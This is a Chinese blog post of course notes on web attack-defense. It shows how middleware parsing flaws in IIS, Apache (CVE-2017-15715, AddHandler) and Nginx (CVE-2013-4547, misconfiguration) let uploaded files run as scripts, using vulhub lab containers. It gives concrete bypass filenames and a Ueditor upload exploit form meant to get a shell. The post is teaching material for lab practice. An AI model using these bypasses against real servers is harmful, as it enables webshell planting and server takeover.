day33WEB 攻防-通用漏洞&文件上传&中间件解析漏洞&编辑器安全

已于 2024-01-26 19:31:18 修改
阅读量1.6k 收藏 11
点赞数 50
分类专栏: 小迪安全-2022年 文章标签: 中间件 安全
于 2024-01-26 16:48:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69583059/article/details/135857580
版权

目录

一,中间件文件解析漏洞-IIS&Apache&Nginx

-IIS 6 7 文件名 目录名

-Apache 换行解析 配置不当

1、换行解析-CVE-2017-15715

2、配置不当-.htaccess 配置不当

-Nginx 文件名逻辑 解析漏洞

1、文件名逻辑-CVE-2013-4547

2、解析漏洞-nginx.conf 配置不当

二,Web 应用编辑器-Ueditor 文件上传安全

三,实例 CMS&平台-中间件解析&编辑器引用

 配套资源下载(百度网盘):

链接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4 
提取码:jgg4
本章节知识点:
1 、中间件安全问题
2 、中间件文件上传解析
3 Web 应用编辑器上传
前置知识:
后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码 ( 解析漏洞除外 )
如: jpg 图片里面有 php 后门代码,不能被触发,所以连接不上后门
如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还
.user.ini&.htaccess
文件上传漏洞测试思路和步骤
1,看中间件是什么,有没有报出过漏洞
2,看文件上传是引用外部的编辑器还是程序员自己编写,如果是引用外部的编辑器就看是什么编辑器,然后查看此编辑器有没有爆出过漏洞,是否可以利用
3,如果是程序员自己编写,那就根据代码逻辑黑盒测试

一,中间件文件解析漏洞-IIS&Apache&Nginx

-IIS 6 7 文件名 目录名

1 、文件名: x.asp;.x.jpg
2 、目录名: x.asp/x.jpg
3 IIS7.X Nginx 解析漏洞一致
漏洞利用条件:
1,是这中间件
2,上传文件能不能修改上传目录或者上传的文件名能增加命名
如果上传的文件名固定或者目录也无法修改,那么这个解析漏洞就无用武之地

-Apache 换行解析 配置不当

1、换行解析-CVE-2017-15715

 漏洞环境:https://vulhub.org/#/environments/httpd/CVE-2017-15715/

2.4.0~2.4.29 版本中存在一个解析漏洞
漏洞利用条件:
1,是这个中间件
2,黑名单验证(在黑名单的后缀不让上传php jsp等),就可以通过php%0a绕过黑名单,但是需要保证这个后缀是能够正常解析的脚本代码。如果是白名单可能不行(在白名单里面才可以上传jpj,png,gif 等),但是如果没有考虑以最后一个点为后缀,通过1.jpj.php%0a的形式也可能能够绕过。
漏洞复现
启动靶场 
xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose build
xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose up -d
上传一个名为1.php的文件,被拦截:
在1.php后面插入一个 \x0A(注意,不能是 \x0D\x0A,只能是一个 \x0A),不再拦截:
访问刚才上传的 /1.php%0a,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞:
关闭靶场 
xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose down
2、配置不当-.htaccess 配置不当

 漏洞环境:https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/

AddHandler application/x-httpd-php .php

在有多个后缀的情况下,只要一个文件含有 .php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。
漏洞利用条件:
1,是这个中间件
2,文件名需要基于本地命名为准(就是文件上传后文件名不会被修改)
漏洞复现
启动靶场 
xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose build
xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose up -d

环境运行后,访问http://your-ip/uploadfiles/apache.php.jpeg即可发现,phpinfo被执行了,该文件被解析为php脚本。

http://your-ip/index.php中是一个白名单检查文件后缀的上传组件,上传完成后并未重命名。我们可以通过上传文件名为xxx.php.jpgxxx.php.jpeg的文件,利用Apache解析漏洞进行getshell。

关闭靶场

xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose down

-Nginx 文件名逻辑 解析漏洞

漏洞利用条件:符号中间件即可测试
1、文件名逻辑-CVE-2013-4547
影响版本: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
漏洞复现
启动漏洞 
xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose build
xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose up -d

这个环境是黑名单验证,我们无法上传php后缀的文件,需要利用CVE-2013-4547。我们上传一个“1.gif ”,注意后面的空格:

访问 http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php,即可发现PHP已被解析:
关闭漏洞 
xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose down

2、解析漏洞-nginx.conf 配置不当
由此可知,该漏洞与 Nginx php 版本无关,属于用户配置不当造成的解析漏洞。
漏洞复现
启动漏洞 
xiaodi@ubuntu:~/vulhub-master/nginx/nginx_parsing_vulnerability$ sudo docker-compose up -d

访问http://your-ip/uploadfiles/nginx.png

访问http://your-ip/uploadfiles/nginx.png/.php

关闭漏洞

xiaodi@ubuntu:~/vulhub-master/nginx/nginx_parsing_vulnerability$ sudo docker-compose down

二,Web 应用编辑器-Ueditor 文件上传安全

利用代码:

<form
action="http://192.168.46.139/net/controller.ashx?action=catchima
ge" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
aozhan001
关注
  • 50
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
day09-内部类&权限&final&静态.md
03-22
day09-内部类&权限&final&静态.md
day08-HTTP&Tomcat&Servlet
10-28
day08-HTTP&Tomcat&Servlet
web安全学习
m0_73767545的博客
09-12 389
子域名两套CMS(同一服务器/不同服务器【同网关/不同网关】)也就是说对于同一网站页面,有不同域名,域名差异可能是前面,也可能是后面。利用网站抓包,server,如果信息比较全,可能是搭建软件。Day08--信息收集(架构,搭建,WAF)Day09--信息收集()
day32WEB 攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀
m0_69583059的博客
01-25 1207
将上传的图片和上传后的图片用16进制编辑器打开,发现两张图片有些地方不一样,明明是同一张图片,为什么会不一样,因为我们将图片上传后,后台对它进行了二次渲染,导致了一些内容的改变。然后上传.user.ini文件,用.user.ini包含a1118962020.gif,尝试用哥斯拉连接。可以上传php文件,但是后门代码会限制,过滤了一些关键词,eval,system等。目录没有首页文件,可以让.user.ini包含日志文件,将后门代码写入到日志文件。后门代码,不能被触发,所以连接不上后门。
Java 文件上传与下载
热门推荐
不懂一休
06-07 3万+
MultipartFile 这个类一般是用来接受前台传过来的文件 Part能获取所有的请求参数的参数名,而Parameter只能获取非文件类型的参数名 Part不能获得普通参数的参数值,只能从 getParameter(String) 获取参数值 想要上传文件到服务器,必须使用Part获得二进制的输入流 Part能获得上传文件的文件大小、文件类型 HttpServletRequest request @RequestPart .........
day34WEB 攻防-通用漏洞&文件上传&黑白盒审计&逻辑&中间件&外部引用
m0_69583059的博客
01-27 1028
无法上传php文件,但是通过修改名称抓包,将后缀改掉可以成功将文件后缀该成.php,但是.php文件并不能执行,没有执行权限,因为同目录下有.htaccess文件,限制了php文件的权限。通过抓包发现,请求数据包并没有看到图片的名称以及类型,这里猜测tk的值就是图片信息,并且进行了base64编码,这里解码tk值看看。返回404错误,现在有两种可能,一就是没有上传成功,二就是上传成功但是路径不一样了,或者文件名被改了。发现执行成功,说明我们刚刚上传的php文件上传成功了,只是名称被改了。
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
20、用友NC/Cloud_Jsinvoke文件上传 21、用友GRP-U8_logs敏感信息泄露 22、飞企互联FE协作平台文件读取 23、启明星辰4A统一安全管控平台信息泄露 24、大华智慧园区综合管理平台任意用户密码读取 25、大华dss城市...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
day04-Tomcat&Servlet入门-资料.zip
09-25
day04-Tomcat&Servlet入门-资料.zip
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
Notes Fifth Day-渗透攻击-红队-信息收集
qq_34801745的博客
09-20 4919
** Notes first day-渗透攻击-红队-信息收集 ** 作者:大余 时间:2020-09-16 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是 出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继续学习发展
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1190
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
漏洞发展趋势安全堪忧的设备
m0_73803866的博客
10-27 592
Adobe 公司在 2005 年收购 Flash,并大力推广应用使其一度是漏洞挖掘人员的研究焦点,根据图 3.4 的历史数据可以看到,2015 和 2016 年爆出的漏洞总数占据整体数量的 55.09%。在 Hacking Team 泄 露 CVE-2015-5122 和 CVE-2015-5199 这两个 0day 漏洞之后,更是给漏洞利用带来了通用的模板 1,但 之后随着 Adobe 引入了隔离堆、Vector 长度检测、CFG保护等安全机制,Flash 漏洞利用的门槛被加 大了很多。 图 3.4 FL
文件上传的多种形式
weixin_62776175的博客
12-09 5871
目录 回顾 一、正文 二、普通文件上传 1、 那么上传文件有什么条件呢: 2、前端页面 3、完成文件上传:---借助第三方jar完成。 commons-fileupload 4、配置文件上传解析器: 5、控制层代码 三、ajax本地上传 1、前端 2、后台代码 四、上传到OSS服务器 1、准备好上一篇创建的密钥,并进入阿里云的官网 2、前端 3、后端 4、自己的Bucket所在地域对应的Endpoint获取 五、通过ajax完成上传到OSS 1、前端 2、后台...
IPC通信中间件综述
Ternence_zq的博客
05-13 598
OpenDDS(Open Data Distribution Service)是一个开源的、面向实时系统的DDS(Data Distribution Service)实现,它提供了高性能和可扩展性的数据分发服务。Apex.OS 是一种开源的、面向自动驾驶系统的软件平台,旨在提供一种可靠、实时的运行环境,以支持自动驾驶系统的开发和部署。FDBus是一种高性能的IPC(进程间通信)中间件,旨在提供快速、可靠的通信机制,适用于实时系统和高性能计算等领域。
聊聊 ASP.NET Core 中间件(三):如何创建自己的中间件
yangshuquan的专栏
05-07 530
本质上,中间件类也是一个普通的 .NET 类,它不需要继承任何父类或者实现任何接口,只要遵守一些约定,就可以轻松创建自己的中间件
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 972
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 333
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
cd "d:\code\day1\" && gcc test.c -o test && "d:\code\day1\"test
07-28
这个命令将首先切换到 `d:\code\day1\` 目录,然后使用 `gcc` 编译 `test.c` 文件,并将可执行文件命名为 `test.exe`。最后,它会运行生成的可执行文件。 请确保你已经在 `d:\code\day1\` 目录下,并且已经安装并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值